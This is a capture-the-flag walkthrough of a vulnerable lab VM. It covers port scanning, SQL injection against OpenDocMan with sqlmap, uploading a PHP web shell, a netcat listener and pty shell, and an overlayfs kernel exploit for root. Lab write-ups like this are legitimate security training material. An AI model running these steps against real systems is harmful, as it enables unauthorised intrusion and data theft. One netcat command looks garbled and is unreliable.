Let’s start with nmap to determine what services are running.
nmap -p- -sV 192.168.2.14
So there is a web server, SSH and IRC running.
Let’s start of with the web server.
There are a lot of directories but none really stick out. Time to look at all the pages.
On 192.168.2.14/jabc/?=node/7 there is a empty page.
But when looking at source (or CTRL+A) there is a hidden message which refers to another site with login possibilities (guest:guest).
At first glance there is a notification on what the site is running on.
OpenDocMan v1.2.7 → document management software.
Let’s see what there is to find about this piece of software on exploit-db.
High-Tech Bridge Security Research Lab discovered multiple vulnerabilities in OpenDocMan, which can be exploited to perform SQL Injection and gain administrative access to the application.
SQL Injection in OpenDocMan: CVE-2014-1945
The vulnerability exists due to insufficient validation of “add_value” HTTP GET parameter in “/ajax_udf.php” script. A remote unauthenticated attacker can execute arbitrary SQL commands in application’s database.
So there is a SQL injection possible on the value_add. Let’s start up sqlmap.
sqlmap -u ‘http://192.168.2.14/jabcd0cs/ajax_udf.php?q=1&add_value=odm_user’ -p add_value –current-db
sqlmap -u ‘http://192.168.2.14/jabcd0cs/ajax_udf.php?q=1&add_value=odm_user’ -p add_value -D jabcd0cs –dump
A quick look on md5decrypt.org learns that the hash is:
Let’s upload a shell file.
Hmmmm…..restricted. Oh well.
Let’s adjust the filter types.
Add document: text/x-php
Let’s try again.
now let’s start listening.
nc -lvnp 31337
And let’s view the document.
Crap….only option is downloading it. Not running it.
That’s no good.
So let’s try this angle.
nc 192.168.2.14 -p 22 -l webmin
Let’s get proper shell.
python -c ‘import pty;pty.spawn(“/bin/bash”)’
Let’s look around. Some interesting directories.
and off course /root
Both restricted. Let’s get root.
We know the server runs on Ubuntu 14.04.
So let’s try the overlayfs exploit (https://www.exploit-db.com/exploits/37292/)
gcc overlayfs.c -o overlayfs
chmod 755 overlayfs
Now let’s check those dirs again.
The dir vulnosadmin has a strange file in it: r00t.blend
r00t.blend: Blender3D, saved as 32-bits little endian with version 2.77
The root dir has got the flag: